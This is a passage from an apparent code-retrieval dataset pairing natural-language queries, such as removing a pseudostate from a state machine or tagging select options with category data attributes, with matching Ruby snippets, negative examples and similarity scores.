"0.4298066",
"0.4296636",
"0.4295851",
"0.429449",
"0.4292067",
"0.42890567",
"0.4286773",
"0.4282695",
"0.4276861",
"0.42765817",
"0.42757794",
"0.42714468",
"0.42714468",
"0.42714468",
"0.42714468",
"0.42708293",
"0.42708293",
"0.42645708",
"0.42530864",
"0.42530677",
"0.4250406",
"0.42484385",
"0.42412305"
] |
0.0
|
-1
|
Removes a Pseudostate from this StateMachine.
|
def remove_connectionPoint! s
  _log { "remove_connectionPoint! #{s.inspect}" }
  @ownedMember.delete(s) # ownedElement?!?!
  @connectionPoint.delete(s)
  s.state = nil
  # Notify.
  s.connectionPoint_removed! self
  self
end
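# Illustrative usage sketch (not part of the retrieved snippet; `machine` and
# `entry_point` are hypothetical names). Assuming the pseudostate was attached
# earlier via a matching add_connectionPoint! call in the same API, removal
# detaches it from both owning collections, clears its back-reference, and
# notifies it:
#
#   machine.remove_connectionPoint! entry_point
#   entry_point.state  # => nil (back-reference cleared)
#   # the method returns `machine` itself, so calls can be chained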
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def delete_state(state)\n states.remove(state)\n end",
"def remove_state(state)\n self.from(state).each { |transition| remove(transition) }\n self.to(state).each { |transition| remove(transition) }\n self.states.delete(state)\n end",
"def remove_from_state state, ios\n return if ios.empty?\n\n state.send do |state|\n SelectorState.new(state.active - ios,\n state.inactive - ios,\n hash_without_keys(state.receivers, ios))\n end\n rescue => e\n log(Logger::ERROR, self.to_s + '#remove_from_state', e.to_s)\n end",
"def delete_state(state)\n @states.reject! { |_,v| v == state }\n#$stderr.print \"States: #{@states.length} \"\n end",
"def delete\n @reg.delete_bits(self)\n self\n end",
"def erase_state(state_id)\n super\n check_state_remove_effects(state_id)\n end",
"def destroy(state)\n hostname = state[:hostname]\n poolsclosed_delete(hostname)\n state.delete(:hostname)\n end",
"def destroy\n @state.destroy\n end",
"def destroy\n @state.destroy\n end",
"def delete_pid()\n if @pid.ours? then\n @pid.delete()\n end\n end",
"def pop_state\n @state.pop\n end",
"def remove_payment\n @payment = Payment.find(params[:id])\n @payment.update!(state: 2)\n end",
"def remove(value)\n connection.zrem(key_label, value)\n end",
"def clear_state\n @state.clear\n self\n end",
"def remove\n __flag__ :remove\n end",
"def remove_shape\n\t\t@shapes.delete_at(0)\n\tend",
"def remove(p)\n @first = counterclockwise(@first) if @first.equal?(p)\n @first = nil if @first.equal?(p)\n @neighbors.delete(p)\n end",
"def remove shape\n @remove_shapes << shape\n end",
"def uncheck\n self.checked = Time.at(0)\n end",
"def unstar\n set_starred_state(false)\n end",
"def delete_state(node)\n # => Find the Node\n existing = find_state(node)\n return 'Node not present in state' unless existing\n # => Delete the Node from State\n state.delete(existing)\n # => Write Out the Updated State\n write_state\n # => Return the Deleted Node\n existing\n end",
"def remove(el)\n n = word_number(el)\n if (n >= @bits.attr_length)\n grow_to_include(el)\n end\n @bits[n] &= ~bit_mask(el)\n end",
"def remove_current_spouse\n raise_unless_current_spouse_enabled\n if gclass.perform_validation_enabled\n ex_current_spouse = current_spouse\n current_spouse.current_spouse = nil\n self.current_spouse = nil\n transaction do\n ex_current_spouse.save!\n save!\n end\n else\n transaction do\n current_spouse.update_attribute(:current_spouse,nil)\n self.update_attribute(:current_spouse,nil)\n end\n end\n end",
"def remove\n uninstall_yri\n uninstall_yard\n end",
"def remove(host, plataform)\n @plataforms[plataform].rem(host)\n end",
"def unset(event)\n key[:schedule].zrem event\n end",
"def clearState()\n\t\t\t@_previous_state = @_state\n\t\t\t@_state = nil\n\t\tend",
"def remove_process!(redis, process_id)\n redis.zrem(key, process_id)\n end",
"def remove(x, y)\n @store[x, y] = 0\n end",
"def remove_token\n update(token: nil)\n end",
"def remove_timer_state(entry)\n timer = entry[1]\n @timers.delete entry\n @timers_time.delete timer\n\n state = remove_state(timer, State::STATE_TIMER)\n deregister_state timer if state == 0\n nil\n end",
"def unmark!\n @session.nickserv.mark(self.name, :off)\n end",
"def unset(name)\n update(name, nil)\n end",
"def remove_midi_source(source)\n @midi.inputs.delete(source)\n end",
"def remove\n @instantiations.dup.each(&:remove)\n @instantiations[0..-1] = []\n true\n end",
"def remove_node(index)\n @strat.remove_node(index)\n @ize -= 1\n end",
"def remove()\n return if @store.empty?\n\n swap(0, @store.length - 1)\n banished = @store.pop\n heap_down(0)\n\n return banished.value\n end",
"def op_del(attrname = nil)\n attrname ||= pop\n push pop.dup\n peek.delete(attrname)\n end",
"def remove\n @store.shift\n end",
"def discard_saved_state\n execute(\"discardstate\", @uuid)\n end",
"def remove_statefile(path)\n key = path.sub(\"#{statefiles_root}/#{@bucket}/\",'')\n delete_empty_statefile(key)\n end",
"def remove!\n zombie_check\n self.class.remove(@name)\n end",
"def clear\n current_state.clear\n end",
"def remove!; end",
"def remove_attribute(name)\n `#@native.removeAttribute(name)`\n end",
"def setup_rem_state\n return unless PONY::ERRNO::check_sequence(current_act)\n current_action_targets.each do |target|\n state_id = @acts[1]\n chance = @acts[2] || 100\n chance = chance / 100.0 if c.integer?\n target.remove_state(state_id) if rand < chance\n end\n end",
"def discard_property\n if(object.is_a?(SemanticProperty))\n SemanticProperty.delete(object.id)\n end\n end",
"def eject!\n #removes the first node\n node = @store.first\n @store.remove(node.key)\n\n #get rid of the map's reference to the deleted node\n @map.delete(node.key)\n end",
"def delete\n self.store -= self\n end",
"def remove_point(point)\n self.points.delete point\n point.cluster = nil\n end",
"def remove(type); end",
"def remove_self\n self.alive = false\n fire :remove_me\n @input_manager.unsubscribe_all self\n end",
"def remove_from_hot_list\n self.update_attribute(:added_to_hot_list, nil)\n end",
"def remove_entry(p)\n\t\t@person.delete(p)\n\tend",
"def remove; end",
"def remove; end",
"def remove; end",
"def remove; end",
"def destroy(state)\n ssh_command(\"#{config[:rmwpar]} -F #{config[:wpar_name]}\", :stderr)\n if wpar_exists?(state)\n raise ActionFailed, \"couldn't destroy wpar !\"\n end\n end",
"def remove_datapoint(key)\n @redis.srem \"datapoints\", key\n end",
"def do_remove_from_termination (term)\r\n term.aln_path_id = nil\r\n term.aln_path = nil\r\n term.save\r\n end",
"def single_sell_in_day_remover(item)\r\n item.sell_in -= 1\r\n end",
"def remove_element\n @app.dom_on_sockets.remove_element @id\n end",
"def removePool(msgstr, ipaddr)\n nmsg = MsgPacket::new\n nmsg.demarshallMsg(msgstr, ipaddr)\n nmsg.updatetime(nmsg)\n @MsgpoolObj.operateMsgPool(DELETE_MESSAGE, nmsg)\n end",
"def disassociate\n disassociate_address(_id)\n end",
"def destroy\n super\n parent.unlist_item(@sym)\n end",
"def remove!(pid)\n kill_child pid\n @pids.delete(pid)\n procline\n end",
"def remove_attribute(name); end",
"def remove_attribute(name); end",
"def remove_attribute(name); end",
"def remove_attribute(name); end",
"def remove_life \r\n @lives -= 1 # this is part of class and objects above\r\n end",
"def unown!(owned)\r\n master_song_relationships.find_by_master_song_owned_id(owned).destroy\r\n end",
"def unbind\n #@node.notifiers.unsubscribe(@notify_sid) if @notify_sid\n @node.command_connections.delete(self)\n end",
"def ~\n Not.new(self)\n end",
"def remove_house(house)\n @houses.delete(house)\n end",
"def remove\n unless self.empty?\n swap(0, @store.length - 1)\n removed_node = @store.pop\n\n heap_down(0)\n\n return removed_node.value\n end\n end",
"def remove( *ruleses )\n self.dup.remove!( *ruleses )\n end",
"def unevent(name)\n Events.remove(name)\n end",
"def clear_flag(symbol)\n @flags.delete(symbol)\n end",
"def unplug!\n return self unless exist?\n ole.Delete\n self\n end",
"def unselect_place\n @selected_place = nil;\n end",
"def remove()\n return if @store.empty?\n last = @store.length - 1\n curr = 0\n swap(last, curr)\n removed = @store.pop\n heap_down(curr)\n return removed.value\n end",
"def remove_attribute(name)\n `#{@element}.removeAttribute(#{name})`\n end",
"def removed(node)\n\t\t\t@size -= 1\n\t\t\treturn node\n\t\tend",
"def disassociate!(target)\n associate!(target,{:delete => 1})\n end",
"def remove_player p\n (@players ||= []).delete p.sym\n end",
"def unuse(n=1)\n self.used -= n\n end",
"def desist\n self.class.delete self\n end",
"def unsignup!(person)\n shifts.collect{|shift| shift.unsignup!(person)}\n end",
"def remove()\n removed = @store[0].value\n swap(0, @store.length - 1)\n @store.pop\n heap_down(0)\n return removed\n end",
"def delete_pose_index\n self.pose_words.clear if Pose.perform_search?\n end",
"def remove(element, new_time)\n @remove_set[element] = new_time.to_i\n self\n end",
"def remove(x, y)\n @store[x].remove(y)\n @store[y].remove(x) if undirected?\n end",
"def remove!(node)\n super\n key_to_node.delete(node.key)\n self\n end",
"def remove_synonym(name)\n execute \"DROP SYNONYM #{quote_table_name(name)}\"\n end",
"def delete!\n owner.delete_pin(myself)\n end",
"def remove\n node = @head\n\n if node\n @head = node.next_node\n @tail = nil unless @head\n\n node.data\n end\n end",
"def remove_attribute(name)\n attr = attributes[name].remove if key? name\n clear_xpath_context if Nokogiri.jruby?\n attr\n end",
"def unsave\n client.post('/api/unsave', id: read_attribute(:name))\n end"
] |
[
"0.5964532",
"0.5688853",
"0.5545519",
"0.5533242",
"0.5403126",
"0.52151054",
"0.5179823",
"0.50300175",
"0.50300175",
"0.502765",
"0.50002515",
"0.4985365",
"0.49594796",
"0.4955674",
"0.49229786",
"0.4909539",
"0.48985252",
"0.48846713",
"0.48604468",
"0.48604453",
"0.48546168",
"0.48496252",
"0.48428592",
"0.4815297",
"0.4810568",
"0.4809271",
"0.480893",
"0.47874427",
"0.4785427",
"0.47772568",
"0.4763617",
"0.47370997",
"0.47367823",
"0.4733378",
"0.4732369",
"0.47290605",
"0.4720744",
"0.46902907",
"0.46854386",
"0.46811327",
"0.4676887",
"0.46578822",
"0.46568763",
"0.46559915",
"0.46521786",
"0.4645584",
"0.46416852",
"0.46411473",
"0.4620852",
"0.46147242",
"0.46146992",
"0.46126264",
"0.46085724",
"0.46047056",
"0.45936263",
"0.45936263",
"0.45936263",
"0.45936263",
"0.45895037",
"0.45876607",
"0.45820278",
"0.45751977",
"0.45747107",
"0.45737147",
"0.45711192",
"0.45614603",
"0.45578736",
"0.45510548",
"0.45510548",
"0.45510548",
"0.45510548",
"0.45447963",
"0.45397073",
"0.45394936",
"0.45388103",
"0.45387644",
"0.45375478",
"0.45299822",
"0.45284763",
"0.452819",
"0.45257065",
"0.4523743",
"0.45226887",
"0.45169976",
"0.4516718",
"0.45156923",
"0.45112926",
"0.45064068",
"0.45010734",
"0.4495485",
"0.4494827",
"0.44921792",
"0.44888768",
"0.44793323",
"0.44776663",
"0.4474847",
"0.4474719",
"0.4474515",
"0.44691852",
"0.44624922"
] |
0.4648106
|
45
|
Add a data attribute to each option of the select to indicate which category the choice is linked to, if any. This allows us to show and hide appropriate fields in JavaScript based on the category.
|
def options_for_select
  choices.map do |choice|
    data = {}
    data["choice-category"] = choice.category_id if choice.category_id
    content_tag(
      :option,
      choice.short_name,
      :value => choice.id,
      :selected => selected_choice?(item, choice),
      :data => data
    )
  end.join.html_safe
end
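# Illustrative output sketch (not part of the retrieved snippet): for a
# hypothetical choice with id 7, short_name "Refund" and category_id 3,
# Rails' content_tag would render roughly
#
#   <option value="7" data-choice-category="3">Refund</option>
#
# and client-side code can read option.dataset.choiceCategory to decide
# which category-specific fields to show or hide.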
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def option_selects\n content_profile_entries.map do |cpe|\n [cpe.description, cpe.id, {'data-description': \"#{cpe.content_type}:#{cpe.topic_type}\"} ]\n end\n end",
"def drink_categories \n # indicate this is coming from signup\n @create_drink_profile = true\n \n # set defaults\n @beer_chosen = 'hidden'\n @cider_chosen = 'hidden'\n @wine_chosen = 'hidden'\n \n if user_signed_in?\n # get user info\n @user = User.find_by_id(current_user.id)\n # send getting started step to jquery\n gon.getting_started_step = @user.getting_started_step\n \n # find if user has already chosen categories\n @user_preferences = DeliveryPreference.find_by_user_id(@user.id)\n \n if !@user_preferences.blank?\n if @user_preferences.beer_chosen == true\n @beer_chosen = 'show'\n end\n if @user_preferences.cider_chosen == true\n @cider_chosen = 'show'\n end\n if @user_preferences.wine_chosen == true\n @wine_chosen = 'show'\n end \n end\n else\n gon.getting_started_step = 0\n end\n\n end",
"def parse_data_options(tag, options)\n return unless options\n parsed_options = options.dup\n options.each do |key, value|\n next if !DATA_ATTRIBUTES.include?(key) || (tag.to_s == 'form' && key == :method)\n parsed_options[\"data-#{key}\"] = parsed_options.delete(key)\n parsed_options[:rel] = 'nofollow' if key == :method\n end\n parsed_options\n end",
"def options_for_category_select(collection={}, category = Category.new)\n \n html_code = \"<option value=\"\">None</option>\"\n \n if collection.empty?\n html_code\n else\n parents = collection.select{ |kategory| kategory.parent_id.nil? }\n parents.each do |parent|\n options = {:value => parent.id}\n options = options.merge({:selected=>\"selected\"}) if parent == category\n html_code += tag(\"option\", options, true) + parent.name + \"</option>\" + indent_child_options_for_category_select(parent, category)\n end\n html_code\n end\n\n end",
"def attr_map \n h = {\n 'data-id' => id,\n 'data-posters' => (@posters || []).map do |p|\n p.attributes.merge(:web_location => p.href)\n end.to_json,\n 'data-year' => @year,\n 'class' => (thumbnail() ? 'withPoster lazyLoadNeeded' : 'noPoster')\n }\n h['data-thumb-src'] = thumbnail.href if thumbnail\n genres.split(',').reduce(h){ |ha, g| ha[\"data-category-#{g.downcase.gsub(' ', '_')}\"] = true; ha }\n end",
"def fresh_categories\n # these are the categories that will be displayed by default\n # in the html view\n return {\n \"speakerData\" => {\"label\" => \"Character Direct Speech\", \"data\" => []},\n \"indirectData\" => {\"label\" => \"Character Indirect Diction\", \"data\" => []},\n \"traitData\" => {\"label\" => \"Trait: Character Type\", \"data\" => []}, \n \"genderData\" => {\"label\" => \"Trait: Character Sex\", \"data\" => []},\n \"maritalStateData\" => {\"label\" => \"Trait: Character Marriage Status\", \"data\" => []},\n \"socecStatusData\" => {\"label\" => \"Trait: Character Class Status\", \"data\" => []},\n \"ageData\" => {\"label\" => \"Trait: Character Age\", \"data\" => []},\n \"occupationData\" => {\"label\" => \"Trait: Character Occupation\", \"data\" => []},\n }\nend",
"def fill_subcategory\n @select_data = Subcategory.ordered_by_category params[:category_id]\n end",
"def indent_child_options_for_category_select(parent, category, child_indent = \" \")\n html_code = \"\"\n parent.children.each do |child|\n options = {:value => child.id}\n options = options.merge({:selected=>\"selected\"}) if child == category\n html_code += tag(\"option\", options, true) + child_indent + child.name + \"</option>\" + indent_child_options_for_category_select(child, category, child_indent + child_indent)\n end\n html_code\n end",
"def chosen_categories\n return chosen_options.collect &:category\n end",
"def dropdown_criterion_question(count, answer = nil, questionnaire_min, questionnaire_max)\n current_value = ''\n current_value += 'data-current-rating =' + answer.answer.to_s unless answer.nil?\n html = '<div><select id=\"responses_' + count.to_s + '_score\" name=\"responses[' + count.to_s + '][score]\" class=\"review-rating\" ' + current_value + '>'\n html += \"<option value = ''>--</option>\"\n questionnaire_min.upto(questionnaire_max).each do |j|\n html += '<option value=' + j.to_s\n html += ' selected=\"selected\"' if !answer.nil? && j == answer.answer\n html += '>' + j.to_s\n html += '-' + min_label if min_label.present? && j == questionnaire_min\n html += '-' + max_label if max_label.present? && j == questionnaire_max\n html += '</option>'\n end\n\n html += '</select></div><br><br><textarea' + ' id=\"responses_' + count.to_s + '_comments\"'\n html += ' name=\"responses[' + count.to_s + '][comment]\" class=\"tinymce\">'\n html += answer.comments if !answer.nil? && !answer.comments.nil?\n html += '</textarea></td>'\n end",
"def association_ajax_select_tag(id, record, reflection)\n if reflection.klass.scaffold_use_auto_complete\n scaffold_text_field_tag_with_auto_complete(id, reflection.klass)\n else\n singular_class = record.class\n foreign_key = reflection.options[:foreign_key] || singular_class.table_name.classify.foreign_key\n association_foreign_key = reflection.options[:association_foreign_key] || reflection.klass.table_name.classify.foreign_key\n join_table = reflection.options[:join_table] || ( singular_class.table_name < reflection.klass.table_name ? '#{singular_class.table_name}_#{reflection.klass.table_name}' : '#{reflection.klass.table_name}_#{singular_class.table_name}')\n items = reflection.klass.find(:all, :order => reflection.klass.scaffold_select_order, :conditions =>[\"#{reflection.klass.table_name}.#{reflection.klass.primary_key} NOT IN (SELECT #{association_foreign_key} FROM #{join_table} WHERE #{join_table}.#{foreign_key} = ?)\", record.id], :include=>reflection.klass.scaffold_include)\n select_tag(id, \"<option></option>\" << items.collect{|item| \"<option value='#{item.id}' id='#{id}_#{item.id}'>#{h item.scaffold_name}</option>\"}.join(\"\\n\"))\n end\n end",
"def drink_categories\n # find if user has already chosen categories\n @user_preferences = DeliveryPreference.find_by_user_id(current_user.id)\n \n # set defaults\n @beer_chosen = 'hidden'\n @cider_chosen = 'hidden'\n @wine_chosen = 'hidden'\n if !@user_preferences.blank?\n if @user_preferences.beer_chosen == true\n @beer_chosen = 'show'\n end\n if @user_preferences.cider_chosen == true\n @cider_chosen = 'show'\n end\n if @user_preferences.wine_chosen == true\n @wine_chosen = 'show'\n end \n end\n \n # set last saved\n @last_saved = @user_preferences.updated_at\n \n end",
"def options_for_component_select var_name, var_data, fields, item\n options = []\n\n # _nil\n unless var_data[:required]\n options.push ['', '_nil']\n end\n\n # fields\n fields.each do |field|\n options.push [field, field]\n end\n\n # _literal\n options.push ['Literal...', '_literal']\n\n # figure\n current = value_for_data(var_name, item)\n\n return options_for_select(options, current)\n end",
"def name_for_select_for_facture\n @name_for_select = self.factcat.name + \" - \" + self.name\n end",
"def filter_option(form_builder, field, option)\n selected = matches_filter_option(field, option[1])\n options = {}\n options[:label] = option[0]\n options[:required] = false\n options[:input_html] = { :id => \"filter_#{field}_#{option[1]}\", :type => :checkbox, :value => option[1], :multiple => true }\n options[:input_html][:checked] = selected\n options[:label_html] = { :for => \"filter_#{field}_#{option[1]}\" }\n options[:wrapper_html] = { :class => \"filter-controls-hidden\" }\n\n klass = [\"filter-options\"]\n klass << \"selected\" if selected\n\n add_filter_klass = [\"filter-add\"]\n if selected\n add_filter_klass << \"icon-remove\"\n else\n add_filter_klass << \"icon-plus\"\n end\n\n content = link_to(\"\", \"#\", :class => add_filter_klass.join(' '))\n content << form_builder.input(field, options)\n\n content_tag :li, content, :class => klass.join(' ')\n end",
"def select_category3(category_option)\n category_locator = Locator.new(NewRequestWhatLocators::CATEGORY).replace_value('<category>', category_option)\n sp_helper.select_radio_btn(category_locator)\n end",
"def set_data(params)\n\t\t#if this is the first time, need to initialize the hash\n\t\tif !self.data[:control_widget] then self.data[:control_widget] = {} end\n\t\t\n\t\tself.data[:control_widget][:choice_1_label_1] = params[:choice_1_label_1]\n\t\tself.data[:control_widget][:choice_1_dest1_page_id] = params[:choice_1_dest1_page_id]\n\t\tself.data[:control_widget][:choice_2_label_1] = params[:choice_2_label_1]\n\t\tself.data[:control_widget][:choice_2_dest2_page_id] = params[:choice_2_dest2_page_id]\n\tend",
"def html_attributes_options(options)\n html_options = options.stringify_keys!\n self.default_options = {'data-role' => \"listview\", 'data-inset' => \"true\"}\n\n if html_options.has_key?('data-inset')\n self.default_options = default_options.merge({'data-inset' => html_options['data-inset']})\n end\n\n if html_options.has_key?('data-theme')\n self.default_options = default_options.merge({'data-theme' => html_options['data-theme']})\n end\n\n if html_options.has_key?('data-rel')\n self.default_options = default_options.merge({'data-rel' => html_options['data-rel']})\n end\n\n if html_options.has_key?('data-transition')\n self.default_options = default_options.merge({'data-transition' => html_options['data-transition']})\n end\n\n end",
"def selectCategory(data = {})\n self.has_expected_element?\n data = data_for('homepage',data)\n case data['category'].downcase.gsub(/\\s+/, '')\n when 'news&politics'\n news_and_politics_element.click\n when 'style'\n style_element.click\n end\n end",
"def build_select(type, select_options_as_html); end",
"def in_my_select attrs = nil\n attrs[:class] ||= ''\n attrs[:class] << ' myselect'\n attrs[:class] = attrs[:class].strip\n\n # La taille du menu peut être déterminé par :width\n size = attrs.delete(:size) || 'normal'\n\n # Il faut ajouter un champ hidden qui contiendra vraiment\n # la valeur avec le nom déterminé\n fid = attrs[:id] || attrs[:name]\n fname = attrs[:name] || attrs[:id]\n attrs[:id] = \"myselect_#{fid}\"\n attrs[:name] = \"myselect_#{fname}\"\n \"<div class=\\\"container_myselect #{size}size\\\">\" +\n attrs[:selected].in_hidden(id: fid, name: fname) +\n self.class.opened_tag('div', attrs) + self.to_s + '</div>' +\n '</div>'\n end",
"def combobox_tag(name, options, opts= {})\n @template.content_tag(:input, :name => \"findpost[\"+sanitize_to_id(name)+\"]\", :placeholder => \"ENGL\", :maxlength => 4, :style => \"width: 55px;\", :type => \"text\", :list => opts[:list_id]) do\n content_tag(:datalist, :id => opts[:list_id]) {options}\n end \n end",
"def category_options\n Category.all.map { |c| [c.categoryName,c.id]}\n end",
"def select_category\n puts \"Please select from the following catagories:\\n\\n\"\n category_lister\n puts \"\\n\\n\"\n fact_input\n end",
"def list\n categories = Meal.distinct.pluck(:category)\n meal_list = []\n categories.each { |category|\n obj = {\n groupName: category.capitalize,\n options: Meal.where(category: category).select(:id, :name)\n }\n meal_list.push(obj)\n }\n\n render json: meal_list\n end",
"def set_category_option\n @category_option = CategoryOption.find(params[:id])\n end",
"def generate_codebook_time_series_group_option(group)\n cls = group.parent_id.present? ? 'subgroup' : 'group'\n content = 'data-content=\\'<span>' + group.title + '</span><span class=\"right-icons\">'\n desc = group.description.present? ? group.description : I18n.t('app.msgs.jumpto_group')\n if group.parent_id.present?\n content << subgroup_icon(desc)\n else\n content << group_icon(desc)\n end\n content << '</span>\\''\n\n return \"<option value='#{group.id}' class='#{cls}' #{content}>#{group.title}</option>\"\n end",
"def uhook_category_partial category\n locale = ::Locale.find_by_iso_code(category.locale)\n content_tag(:dt, ::Category.human_attribute_name(\"locale\") + ':') +\n content_tag(:dd, (locale.native_name.capitalize.html_safe rescue t('ubiquo.category.any')))\n end",
"def set_category\n end",
"def create_select_options(choice, collection, options={})\n options[:text] ||= 'name'\n options[:value] ||= 'id'\n options[:include_blank] = true if options[:include_blank].nil?\n options[:clear] ||= []\n pre = options[:include_blank] ? \"<option value=\"\">\"\"</option>\" : \"\"\n collection.each { |c| pre << \"<option value=#{c.send(options[:value])} #{\"selected=\\\"selected\\\"\" if choice == c.send(options[:value])}>#{c.send(options[:text])}</option>\" }\n pre\n end",
"def return_cat_data(categories, data)\n category_data = []\n categories.each do |category|\n category_data.push(category[\"#{data}\"])\n end\n category_data\nend",
"def allowed_cat_entries(options)\n rails_logger('allowed_cat_entries', 0)\n @values[\"#{options[:prov_field_name]}_category\".to_sym] = options[:category]\n cat = Classification.lookup_by_name(options[:category].to_s)\n result = cat ? cat.entries.each_with_object({}) { |e, h| h[e.name] = e.description } : {}\n rails_logger('allowed_cat_entries', 1)\n result\n end",
"def new\n @post = Post.new\n @category_options = Category.all.map{|u| [u.title, u.id]}\n # @category_options = Category.all\n end",
"def ajax_category\n case params[:category]\n when Reporting::ALL\n @query_hash = {:category_all => true}\n when Reporting::PROVIDER\n @query_hash = {:category_provider => true}\n when Reporting::PATIENT\n @query_hash = {:category_patient => true}\n when Reporting::CLAIM\n @query_hash = {:category_claim => true}\n when Reporting::BALANCE\n @query_hash = {:category_balance => true}\n when Reporting::INVOICES\n @query_hash = {:category_invoice => true}\n when Reporting::USER\n @query_hash = {:category_user => true}\n when Reporting::SYSTEM\n @query_hash = {:category_system => true}\n end\n @reporting = Reporting.without_status(:deleted).where(@query_hash)\n end",
"def variant_options(v, options={})\n #content_tag(:ul, :class => \"list\")\n # v.options_text\n #we have hide additional price shown in varians\n # if variant_price v\n # v.options_text.to_s + \" \" + (variant_price v).to_s\n # else\n v.options_text\n # end\n end",
"def select_cat_from_tree(obj, col, root, selected_obj, *args)\n options = args.extract_options!\n select_name = obj + '[' + col.to_s + ']'\n out = \"<select name='#{select_name}' onchange => update_category('#{obj}', facture)>\"\n out << select_cat_from_tree_recurs(root, selected_obj)\n out << \"</select>\"\n end",
"def select_category\n #Parbauda vai ekrans ir redzams\n @screens.screen_create_filter.visible?\n #Pievieno kategoriju no filtra datiem\n @screens.screen_create_filter.select_row(@filter_data.category)\n end",
"def select_tag(name, option_values, options={})\n label = options.delete(:label) || name.titleize\n label.gsub!(' ', ' ')\n content_tag(\"dt\", content_tag(\"label\" , \"#{label}:\", :for => name )) + \"\\n\" +\n content_tag(\"dd\", @super.select_tag(name, option_values, options))\n end",
"def option_tag(text); end",
"def uhook_select_fittest category, options = {}\n options[:locale] ? (category.in_locale(options[:locale]) || category) : category\n end",
"def tags_and_categories=(text)\n active_content_div.text_field(:id=>/as-input-\\d+/).set text +\"\\n\"\n wait_for_ajax\n end",
"def create_fields_of(data, category)\n data.each do |k, v|\n params = Field.class_name_for_type(v['type']).constantize.create_from_hash(k, v)\n params.merge!(category: category)\n field = Field.class_name_for_type(v['type']).constantize.create!(params)\n self.general_fields << field #NOTE Since we have already created the object, the category attribute will not change if we add it to the incorrect set of fields. Hence, just add all to general_fields\n end\n end",
"def populate(attributes)\n attributes.each do |attribute, value|\n id = id_for(attribute)\n\n case control_type_for(id)\n when :file\n attach_file id, value\n when :select\n find_by_id(id).find(\"option[value='#{value}']\").select_option\n when :checkbox\n find_by_id(id).set(value)\n else\n fill_in id, :with => value\n end\n end\n end",
"def option_list(label_attribute = 'name')\n countries.map { |country| [country[label_attribute], country['code']] }\n end",
"def opportunity_campaign_select(options = {})\n options[:selected] ||= @opportunity.campaign_id || 0\n selected_campaign = Campaign.find_by_id(options[:selected])\n campaigns = ([selected_campaign] + Campaign.my.order(:name).limit(25)).compact.uniq\n collection_select :opportunity, :campaign_id, campaigns, :id, :name, options,\n \"data-placeholder\": t(:select_a_campaign),\n \"data-url\": auto_complete_campaigns_path(format: 'json'),\n style: \"width:330px; display:none;\",\n class: 'ajax_chosen'\n end",
"def custom_item_form options\n group_html = \"<li id='#{options[:id]}' class='p'>\"\n group_html += options[:label] ? \"<label for='#{options[:id]}'>#{options[:label]}</label>\" : \"\"\n group_html += \"<div class='wrap-custom-html'>#{options[:html]}</div>\"\n group_html += options[:hint] ? \"<p class='inline-hints'>#{options[:hint]}</p>\" : \"\"\n group_html += \"</li>\"\n group_html.html_safe\n end",
"def set_dropdown_condition(name,value,condition)\n self.dropdown_conditions[\"#{name.to_s}_#{value}\"] = condition\n end",
"def set_lectures\r\n @category = Category.find(params[:category_id])\r\n end",
"def indent_child_options_for_parent_category_select(category, parent, child_indent = \" \")\n html_code = \"\"\n parent.children.each do |child|\n options = {:value => child.id}\n options = options.merge({:selected=>\"selected\"}) if child == category.parent\n html_code += tag(\"option\", options, true) + child_indent + child.name + \"</option>\" + indent_child_options_for_parent_category_select(category, child, child_indent + child_indent) unless child==category\n end\n html_code\n end",
"def normalize_options\n copy_options_to_attributes(ATTRIBUTE_OPTIONS)\n copy_boolean_options_to_attributes(ATTRIBUTE_BOOLEAN_OPTIONS)\n handle_key_option\n handle_errors_option\n\n Forme.attr_classes(@attr, @opts[:class]) if @opts.has_key?(:class)\n\n if @opts[:error]\n Forme.attr_classes(@attr, 'error')\n @attr[\"aria-invalid\"] = \"true\"\n if @opts.fetch(:error_handler, true)\n if @opts[:error_id]\n @attr['aria-describedby'] ||= @opts[:error_id]\n else\n if id = @attr[:id] || @attr['id']\n error_id = @attr['aria-describedby'] ||= \"#{id}_error_message\"\n @opts[:error_id] = error_id\n end\n end\n end\n end\n\n if data = opts[:data]\n data.each do |k, v|\n k = k.to_s.tr(\"_\", \"-\") if k.is_a?(Symbol) && input.opts[:dasherize_data]\n sym = :\"data-#{k}\"\n @attr[sym] = v unless @attr.has_key?(sym)\n end\n end\n end",
"def manipulate_option(yaml_data_key)\n manipulate_option_raw(\n get_yaml_data( yaml_data_key, 0 ).to_sym,\n get_yaml_data( yaml_data_key, 1 ).to_sym,\n get_yaml_data( yaml_data_key, 2 ),\n get_yaml_data( yaml_data_key, 3 ),\n get_yaml_data( yaml_data_key, 4 )\n )\n end",
"def select_list_option\n select_list.a(:class => \"select-list-option\")\n end",
"def select_list\n require 'pashua'\n include Pashua\n\n config = \"\n *.title = personal time tracker\n cb.type = combobox\n cb.completion = 2\n cb.width = 400\n cb.default = surfing\n cb.tooltip = Choose from the list\n db.type = cancelbutton\n db.label = Cancel\n db.tooltip = Closes this window without taking action\" + \"\\n\"\n\n # insert list of all choices\n cust = get_custom_cats || []\n cat = (cust ? cust + Categories : Categories)\n cat.each { |c| config << \"cb.option = #{c}\\n\" }\n pagetmp = pashua_run config\n exit if pagetmp['cancel'] == 1 || pagetmp['cb'] == nil\n\n choice = pagetmp['cb'].strip\n notify_change(choice)\n log(choice)\n\n unless cat.index(choice)\n cust << choice\n write_custom_cats(cust)\n end\nend",
"def set_catagory\n @catagory = Catagory.find(params[:id])\n end",
"def select(attribute, choices, options = {})\n object_value = @object ? @object.send(attribute) : nil # grab the object's value\n options.reverse_merge!(:label => attribute.to_s.titleize, :id => \"#{object_name(:id)}_#{attribute}\")\n @renderer.select_tag(\"#{object_name}[#{attribute}]\", @template.options_for_select(choices, object_value), options)\n end",
"def data_attributes=(attributes)\n attributes.each do |k, v|\n self[\"data-#{k}\"] = v\n end\n end",
"def define_dynamic_answer_setters!\n if offering\n offering.questions.find_all_by_dynamic_answer(true).each do |oq|\n if oq.display_as.include?(\"checkbox_options\")\n oq.options.each do |option|\n self.class.send :define_method, \"dynamic_answer_#{oq.id.to_s}_#{option.id.to_s}=\", Proc.new {|argv| set_answer(oq.id, argv, option.id)}\n end \n else\n self.class.send :define_method, \"dynamic_answer_#{oq.id.to_s}=\", Proc.new {|argv| set_answer(oq.id, argv)}\n end \n end\n end\n end",
"def use_data_with(key, value)\n value = preprocess_value(value, key)\n\n element = public_send(key.to_s.tr(' ', '_'))\n set_and_select(key, element, value)\n check_and_uncheck(key, element, value)\n click(key, element)\n end",
